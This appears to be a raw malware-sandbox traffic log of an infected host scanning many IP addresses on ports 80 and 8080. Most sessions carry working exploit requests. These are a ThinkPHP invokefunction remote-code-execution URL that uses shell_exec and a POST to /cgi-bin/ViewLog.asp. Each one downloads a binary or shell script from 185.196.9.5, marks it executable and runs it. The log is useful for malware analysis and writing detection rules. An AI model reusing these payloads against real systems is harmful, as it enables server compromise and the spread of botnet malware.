Feb 25, 2024 19:04:17.627269030 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:17.719165087 CET	501	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:21 GMT Server: Apache/2.4.54 (Debian) Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 36 35 2e 31 39 36 2e 31 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at 107.165.196.135 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
767	192.168.2.15	47296	85.122.199.118	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.718231916 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
768	192.168.2.15	37190	31.136.75.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.721867085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:20.965459108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:27.109488964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:39.141233921 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.996989965 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
769	192.168.2.15	52842	88.149.138.25	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.739689112 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
770	192.168.2.15	41706	88.202.186.97	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.886677980 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:18.054492950 CET	552	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:19 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.8 Content-Length: 334 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 50 48 50 2f 38 2e 30 2e 38 20 53 65 72 76 65 72 20 61 74 20 62 72 69 67 68 74 77 61 74 65 72 67 69 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.8 Server at brightwatergis.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
771	192.168.2.15	52294	31.40.225.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.937452078 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:18.156697035 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:34:05 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
772	192.168.2.15	56970	94.121.104.88	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.991539001 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
773	192.168.2.15	50702	62.29.27.185	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.994350910 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
774	192.168.2.15	41996	95.86.65.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:18.000538111 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
775	192.168.2.15	50262	88.221.194.99	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:18.568077087 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:18.913484097 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:19.180543900 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
776	192.168.2.15	47574	95.213.248.25	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.045173883 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:19.254152060 CET	322	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
777	192.168.2.15	44062	95.227.186.124	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.061575890 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
778	192.168.2.15	37788	95.134.36.128	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.117058039 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
779	192.168.2.15	37770	95.56.79.187	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.312727928 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:19.581077099 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:19.581195116 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
780	192.168.2.15	42398	94.122.67.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.920581102 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
781	192.168.2.15	37142	94.121.139.232	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:19.922988892 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
782	192.168.2.15	39566	85.93.218.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:20.096461058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:20.645539045 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
